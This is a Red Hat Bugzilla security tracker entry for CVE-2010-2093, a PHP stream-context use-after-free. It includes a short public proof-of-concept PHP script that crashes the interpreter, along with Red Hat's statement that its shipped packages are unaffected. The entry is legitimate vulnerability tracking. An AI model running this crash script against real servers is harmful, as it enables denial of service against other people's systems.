Bug 598474 (CVE-2010-2093, MOPS-2010-022)

Summary: CVE-2010-2093 PHP: Context stream use-after-free on request shutdown (MOPS-2010-022)
Product: [Other] Security Response Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: bressers, jorton, mjc, vdanen
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
URL: http://php-security.org/2010/05/12/mops-2010-022-php-stream-context-use-after-free-on-request-shutdown-vulnerability/index.html
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2011-09-21 05:38:20 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Jan Lieskovsky 2010-06-01 13:12:53 UTC 
Common Vulnerabilities and Exposures assigned an identifier CVE-2010-2093 to
the following vulnerability:

Use-after-free vulnerability in the request shutdown functionality in
PHP 5.2 before 5.2.13 and 5.3 before 5.3.2 allows context-dependent
attackers to cause a denial of service (crash) via a stream context
structure that is freed before destruction occurs.

References:
  [1] http://php-security.org/2010/05/12/mops-2010-022-php-stream-context-use-after-free-on-request-shutdown-vulnerability/index.html

Public PoC (from [1]):

<?php
     $blah = fopen('/dev/zero','a');
     $arr = array();
     for ( $i = 0 ; $i < 5000 ; $i++ ) {
       $arr[$i] = "";
     }
     stream_context_get_options($blah);
     $a88 = fread($blah,100000000000);
  ?>

Credit: Mateusz Kocielski
Comment 3 Tomas Hoger 2010-07-28 10:00:14 UTC 
This issue is still unfixed in 5.3.3.
Comment 4 Huzaifa S. Sidhpurwala 2011-09-21 05:34:59 UTC 
Statement:

Not Vulnerable. This issue does not affect the version of php as shipped with Red Hat Enterprise Linux 4, 5 and 6. This issue does not affect the version of php53 as shipped with Red Hat Enterprise Linux 5.
Comment 5 Huzaifa S. Sidhpurwala 2011-09-21 05:38:20 UTC 
Fedora is currently updated to php-5.3 which is not affected by this flaw.